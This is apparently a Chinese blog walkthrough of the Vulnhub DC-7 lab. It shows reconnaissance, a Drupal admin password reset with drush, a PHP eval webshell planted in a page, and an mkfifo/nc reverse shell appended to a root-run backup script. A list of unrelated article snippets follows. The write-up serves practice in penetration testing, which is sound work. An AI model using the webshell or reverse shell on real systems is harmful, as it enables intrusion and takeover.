Vulnhub靶场DC-7练习
目录
- 0x00 准备
- 0x01 主机信息收集
- 0x02 站点信息收集
- 1. 获取用户名/密码
- 2. ssh连接目标主机
- 3. drush命令修改Drupal密码
- 0x03 漏洞查找与利用
- 1. Drupal写入php木马
- 2. 连接shell
- 3. 反弹shell并提权
- 0x04 总结
0x00 准备
下载链接:https://download.vulnhub.com/dc/DC-7.zip
介绍:
If you need to resort to brute forcing or dictionary attacks, you probably won’t succeed.
What you will need to do, is to think “outside” of the box.
Waaaaaay “outside” of the box. 😃
重要信息:
如果你需要求助于暴力破解或字典攻击,你可能不会成功。
你需要做的是“跳出框框”思考。
Waaaaaay “外面”的盒子。😃
0x01 主机信息收集
kali中执行命令:ifconfig
kali本机的ip:192.168.22.48
探测目标主机ip,执行命令:netdiscover - i eth0 192.168.22.0/24
目标主机的ip:192.168.22.6
探测目标主机的开放端口,执行命令:nmap -sS -sV -A -n 192.168.22.6
开放了22端口,80端口,并且使用的CMS为 Drupal8。
0x02 站点信息收集
1. 获取用户名/密码
浏览器访问:http://192.168.22.6/
页面上的提示语跟前面的介绍一样,用暴力破解或者字典攻击就不会成功,需要做的是跳出框框思考,跳出盒子。“盒子”可以想到白盒黑盒。跳出盒子也就是白盒。可以考虑找源代码了。
左下角有一个用户名,DC7USER。
Google一下这个用户名,可以发现一个github账户。主页发现一个staffdb项目,看到是php语言的,有个config.php的配置文件。
查看一下文件内容,有用户名和密码。还有数据库的名字。
$username = "dc7user";
$password = "MdR3xOgB7#dW";
考虑用这个用户名和密码登录。
扫描一下站点的目录结构,看有没有可以登录的点:dirsearch -u 192.168.22.6
访问:http://192.168.22.6/user/login.php
用上面获得的用户名和密码进行登录,失败。
2. ssh连接目标主机
之前扫描端口的时候还发现开房了22端口。考虑ssh链接。执行命令:ssh dc7user@192.168.22.6
登录成功。
看一下都有什么文件。一个backups目录和一个mbox文件。
backups目录下是两个gpg文件,gpg命令是用来加密文件的,并且加密后的文件都是乱码。
看一下mbox文件的内容:cat mbox
发现一个可执行脚本文件的路径:/opt/scripts/backups.sh
以及数据库数据的保存路径:/home/dc7user/backups/website.sql
查看一下这个脚本文件的内容,执行命令:cat /opt/scripts/backups.sh
3. drush命令修改Drupal密码
看起来是对数据相关的文件进行打包备份删除之类的操作。有个drush命令。
drush sql-dump的功能是数据库导入。
快速了解一下drush命令,发现这个命令可以用来更改Drupal的密码,相关命令是:drush user-password someuser --password="password"
需要注意,执行这个命令的时候,需要切换到Drupal的目录下。从上面的 backups.sh 这个文件的内容可以看出来,在执行drush命令之前先进入了 /var/www/html目录。
所以接下来先进入 /var/www/html目录,再执行命令:drush user-password admin --password="123456"
更改密码成功。
再访问:http://192.168.22.6/user/login ,用admin和123456尝试登录。登录成功。
0x03 漏洞查找与利用
1. Drupal写入php木马
接下来的思路就是找可以反弹shell的地方。
在 Content - Add Content - Basic page 下发现可以添加代码,但是只支持html,不支持php。
查询官方文档:https://www.drupal.org/project/php
Drupal8以后,php需要单独下载导入。
下载的地址:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
下载好以后,依次点击:Manage - Extend扩展 - Install new module启用新增模块,导入刚下载的php模块。
(也可以不下载,再倒入模块的时候直接输入上面的下载URL)
倒入成功后,点击Enable newly added modules。
在Manage - Extend模块下,选中 PHP Filter,点击Install。就启用成功了。
可以看到启用成功的提示。
在 Manage - Content 下的 welcome to dc-7 这个文件,应该是 http://192.168.22.6 这个页面的文件。
考虑编辑这个文件,把一句话木马写入这个文件。Edit这个文件,输入一句话木马,并且最后文件格式要保存成php。最后点击save按钮。
<?php
@eval($_POST[shell]);
?>
2. 连接shell
回到网站的首页就可以解析有恶意代码的文件。
用蚁剑连接一下,注意上下编码都选base64。
3. 反弹shell并提权
连接成功以后考虑提权。
执行命令:sudo -l,提示没有sudo权限。
想起来前面的/opt/scripts/backups.sh脚本文件,看一下这个文件的权限。
这个脚本文件的所属主是root,所属组是www-data,当前用户是www-data。
所以可以把提权的命令写入到这个脚本文件中,然后直接执行这个脚本文件。
先在kali中监听9876端口,执行命令:nc -lvvp 9876
在蚁剑中直接编辑/opt/scripts/backups.sh这个文件,在最后一行写入:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.22.48 9876 >/tmp/f
点击右上角的save。
在蚁剑中可以查看一下文件内容,确认写入成功:cat backups.sh
再执行这个脚本:./backups.sh
在kali中看到监听端口成功。
查看当前用户:id ,是root用户。
提权成功。
0x04 总结
主机信息收集:
- netdiscover探测目标主机ip。
- nmap探测开放端口和服务。
站点信息收集:
- 根据提示找到配置文件,获取用户名密码。
- ssh连接目标主机。
- drush修改Drupal密码。
漏洞利用:
- Drupal写入php木马。
- 蚁剑连接shell。
- 反弹shell。
- 提权。
相关文章:
Vulnhub靶场DC-7练习
目录 0x00 准备0x01 主机信息收集0x02 站点信息收集1. 获取用户名/密码2. ssh连接目标主机3. drush命令修改Drupal密码 0x03 漏洞查找与利用1. Drupal写入php木马2. 连接shell3. 反弹shell并提权 0x04 总结 0x00 准备 下载链接:https://download.vulnhub.com/dc/DC-…...
吴恩达深度学习笔记1 Neural Networks and Deep Learning
参考视频:(超爽中英!) 2024公认最好的【吴恩达深度学习】教程!附课件代码 Professionalization of Deep Learning_哔哩哔哩_bilibili Neural Networks and Deep Learning 1. 深度学习引言(Introduction to Deep Learning) 2. 神 经 网 络 的 编 程 基 础…...
(十)Spring教程——Spring配置概述
目录 前言 1.Spring容器高层视图 2.基于XML的配置 前言 在使用Spring所提供的各项丰富而神奇的功能之前,必须在Spring IoC容器中装配好Bean,并建立好Bean和Bean之间的关联关系。Spring的配置文件已经很精简了,但是广大的开发者希望它做得更…...
飞书群聊机器人自定义机器人接入,并实现艾特@群成员功能
飞书群聊机器人还是比钉钉的要麻烦一点,钉钉的直接通过手机号就可以艾特群里面的人,但是飞书的要想艾特群里面的人,需要使用用户的 Open ID 或 User ID。这两个ID怎么获取呢?还需要在飞书的开放平台上创建一个应用,然后…...
CrowdStrike更新致850万Windows设备宕机,微软紧急救火!
7月18日,网络安全公司CrowdStrike发布了一次软件更新,导致全球大范围Windows系统宕机。 预估CrowdStrike的更新影响了将近850万台Windows设备,多行业服务因此停滞,全球打工人原地放假,坐等吃瓜,网络上爆梗…...
银行黄金交易流程
银行黄金交易流程 银行黄金交易流程通常包括以下几个步骤: 咨询和开户: 首先,客户需要到银行的贵金属交易柜台或在线平台咨询黄金交易的相关规定和手续,然后进行开户,在银行开立有关黄金交易的账户。这可能需要提供个…...
MATLAB实验五:MATLAB数据分析
1. 某线路上不同时间对应的电压如下表所示: 1)用 3 次多项式拟合(polyfit)该实验曲线,要求绘制 2 原始采样 点,并在 1~8 范围内,使用时间间隔为 0.2 的数据绘制拟合曲线。 建立一个脚本文件:text5_1.m 如下…...
Cannot perform upm operation: connect ETIMEDOUT 34.36.199.114:443 [NotFound]
版本:Unity 2018 Windows 问题:打开 Package Manager,加载报错 尝试解决: 删除项目文件里的Packages下的mainfest.json文件,然后重新打开项目(X)重新登录 Unity 账号(X)…...
Docusaurus VS VuePress:哪一个更适合你的技术文档?
💝💝💝欢迎莅临我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。 推荐:「stormsha的主页」…...
昇思25天学习打卡营第25天|MindNLP ChatGLM-6B StreamChat
配置环节 %%capture captured_output !pip uninstall mindspore -y !pip install -i https://pypi.mirrors.ustc.edu.cn/simple mindspore2.2.14 !pip install mindnlp !pip install mdtex2html配置国内镜像 !export HF_ENDPOINThttps://hf-mirror.com下载与加载模型 from m…...
海康威视综合安防管理平台 detection 前台RCE漏洞复现
0x01 产品简介 海康威视综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。海康威视集成化综合管理软件平台,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。 0x02 漏洞概述 海康…...
【BUG】已解决:ModuleNotFoundError: No module named ‘PIL‘
已解决:ModuleNotFoundError: No module named ‘PIL‘ 目录 已解决:ModuleNotFoundError: No module named ‘PIL‘ 【常见模块错误】 错误原因: 解决办法: 欢迎来到英杰社区https://bbs.csdn.net/topics/617804998 欢迎来到我…...
css font 优化
文章目录 使用 font-display 控制字体加载预加载关键字体选择合适的字体文件类型按需创建字体文件HTTP 缓存优化 使用 font-display 控制字体加载 避免字体加载导致的空白 block:浏览器在短暂的阻塞期内不显示任何文本,直到字体加载完成。这可能导致页…...
Go之Web急速入门Gin+Gorm框架
简介 只作为快速入门、了解Go的GinGorm框架的demo,不能作为企业级开发。 详细用法请看官网 《Gin官网》 《Gorm官网》 使用GoLand创建Go项目(默认modules) go版本1.22.2 需要设置代理下载go相关软件包,否则软件包可能无法下载。…...
【MySQL进阶之路 | 高级篇】ER模型
1. 概述 数据库设计是牵一发而动全身的。那么有没有什么办法可以提前看到数据库的全貌呢?比如需要哪些数据表,数据表中应该有哪些字段,通过什么字段进行连接等等。这样我们才能进行整体的梳理和设计。 其实,ER模型就是一个这样的…...
C++基础语法:STL之容器(4)--序列容器中的list(一)
前言 "打牢基础,万事不愁" .C的基础语法的学习 引入 序列容器的学习.以<C Prime Plus> 6th Edition(以下称"本书")内容理解 本书中容器内容不多只有几页.最好是有数据结构方面的知识积累,如果没有在学的同时补上. 序列容器回顾:序列容器内元素按严格…...
WordPress杂技
WordPress杂技 WordPress页面构建器: Avada、Elementor、astra、 Elementor作为一款强大的页面构建工具。 Avada:是一款非常受欢迎的WordPress主题,它的设计理念是简洁、现代、响应式,Avada拥有丰富的模板和布局,可以轻松创建出…...
鸿蒙 动态共享包HSP的创建和引用
1.什么是动态共享包HSP HSP(Harmony Shared Package)是动态共享包,可以包含代码、C库、资源和配置文件,通过HSP可以实现代码和资源的共享。HSP不支持独立发布,而是跟随其宿主应用的APP包一起发布,与宿主应…...
ARM架构(二)—— arm v7-a/v8/v9寄存器介绍
1、ARM v7-A寄存器 1.1 通用寄存器 V7 V8开始 FIQ个IRQ优先级一样, 通用寄存器:31个 1.2 程序状态寄存器 CPSR是程序状态毒存器,保存条件标志位,中断禁止位,当前处理器模式等控制和状态位。每种异常模式下还存在SPS…...
C++合作开发项目:美术馆1.0
快乐星空MakerZINCFFO 合作入口:CM工作室 效果图: 代码: (还有几个音乐!) main.cpp #include <bits/stdc.h> #include <windows.h> #include <conio.h> #include <time.h> #in…...
QT 5 同时使用Q_DECLARE_METATYPE(pointdata) 和继承 QObjectUserData
在Qt框架中,QObjectUserData 和 Q_DECLARE_METATYPE() 宏都与Qt的元对象系统有关,但它们的使用方式有一些特别的限制和兼容性问题。 关于QObjectUserData: QObjectUserData 是一个用来存储用户数据的类。在Qt中,每个 QObject 可以…...
【MySQL进阶之路 | 高级篇】范式概述与第一范式
1. 范式简介 在关系型数据库中,关于数据表的设计的基本原则,规则就称为范式。可以理解为,一张数据表的设计结果需要满足的某种设计标准的级别。要想设计一个结构合理的关系型数据库,必须满足一定的范式。 范式的英文名是Normal …...
Open-TeleVision复现及机器人迁移
相关信息 标题 Open-TeleVision: Teleoperation with Immersive Active Visual Feedback作者 Xuxin Cheng1 Jialong Li1 Shiqi Yang1 Ge Yang2 Xiaolong Wang1 UC San Diego1 MIT2主页 https://robot-tv.github.io/链接 https://robot-tv.github.io/resources/television.pdf代…...
Notepad++换安装路径之后,右键打开方式报错:Windows无法访问指定设备、路径或文件。你可能没有适当的权限访问该项目。的处理方法
把Notepad添加到右键打开方式,可以参考下面的3篇文章添加: https://blog.csdn.net/xiaoerbuyu1233/article/details/88287747 https://blog.csdn.net/qq_44000337/article/details/120277317 https://www.cnblogs.com/zhrngM/p/12899026.html 这里主要是…...
【Flutter 面试题】 使用成熟状态管理库的弊端有哪些?
【Flutter 面试题】 使用成熟状态管理库的弊端有哪些? 文章目录 写在前面口述回答补充说明写在前面 🙋 关于我 ,小雨青年 👉 CSDN博客专家,GitChat专栏作者,阿里云社区专家博主,51CTO专家博主。2023博客之星TOP153。 👏🏻 正在学 Flutter 的同学,你好! 😊 …...
Apache Commons技术详解
文章目录 简介官网链接原理基础使用Commons LangCommons Collections 高级使用Commons IOCommons Math 优缺点优点缺点 总结 简介 Apache Commons 是 Apache 软件基金会下的一个项目,旨在提供可重用的Java组件。这些组件覆盖了广泛的编程任务,从字符串处…...
怎样使用 Juicer tools 的 dump 命令将.hic文件转换为交互矩阵matrix计数文件 (Windows)
创作日志: 万恶的生信…一个scHiC数据集没有提供处理好的计数文件,需要从.hic转换。Github一个个好长的文档看了好久才定位到 juicer tools 的dump命令,使用起来比想象中简单。 一、下载Juicer tools 注意:使用Juicer tools的前提…...
【Docker】Docker Desktop - WSL update failed
问题描述 Windows上安装完成docker desktop之后,第一次启动失败,提示:WSL update failed 解决方案 打开Windows PowerShell 手动执行: wsl --set-default-version 2 wsl --update...
基于rsync\unlink 等一套本机备份跨机备份历史备份清理shell 脚本
一 摘要 本文主要介绍一套本地备份、跨机器备份、历史备份清理脚本,使用场景如数据库备份等 二 环境 linux 系列系统 基本都支持,个别命令可能需要微调。 2.1 实验环境 [rootlocalhost rsync]# cat /etc/centos-release CentOS Linux release 7.9.2…...
使用nginx实现一个端口和ip访问多个vue前端
前言:由于安全组要求,前端页面只开放一个端口,但是项目有多个前端,此前一直使用的是一个前端使用单独一个端口进行访问,现在需要调整。 需要实现:这里以80端口为例,两个前端分别是:p…...
网站建设风险是什么意思/企业所得税优惠政策
众里寻他千百度,蓦然回首,那人却在灯火阑珊处。--《青玉案元夕》要学会看crash崩溃和报告一个应用程序并不总会一直运行的很好,它总会有出现crash崩溃的情况。如果在应用程序中接入了一些第三方的crash收集工具或者自建crash收集报告平台的话…...
网站播放mp3代码/优秀网站设计案例
1.PCB板材要求 普通板材采用FR4板材,背板采用高TG的FR4板材; 2.PCB表面工艺 沉金工艺,墨绿色哑光阻焊,白色丝印; 3.PCB尺寸、外形要求 PCB外形、尺寸与接口位置要在结构允许范围内,可以和结构工程师及时沟…...
成都网站建设比较好的公司/已备案域名交易平台
弹出view,input框文字飘到view上,如上图。官方解释: http://www.wxapp-union.com/forum.php?modviewthread&tid1600 由于textarea是原生组件实现,层级最高,目前还无法支持在上面覆盖元素这样的交互设计。 既然如此…...
电子商务网站建设移动电商开发/如何在网上做销售推广
1、SQL统计某字段的出现次数 比如统计某个表中,姓名出现的次数:select name,count(*) from biao group by name having count(*) > 2 关键是用分组:group by,且经常和聚合函数一起使用 比如:统计用户表中的匿名字段…...
wordpress autopost/发布会直播平台
一,备份原先的php文件 查看现有php版本: [rootlocalhost local]# php -v PHP 5.5.38 (cli) (built: Oct 24 2017 15:58:09) 备份,由于不是覆盖安装,这里也可以不备份,但是,作为日常操作习惯来说࿰…...
作文网站网址/互联网营销主要学什么
当今组织中技术驱动流程的广泛主导地位需要无可挑剔的测试和质量保证。软件测评机构质量保证实践对于采用和部署高性能、无故障的应用程序是必要的,这可以有效地产生优化的行动过程,从而全面改善最终结果。下面一航软件测评的小编为大家讲解软件测试当中…...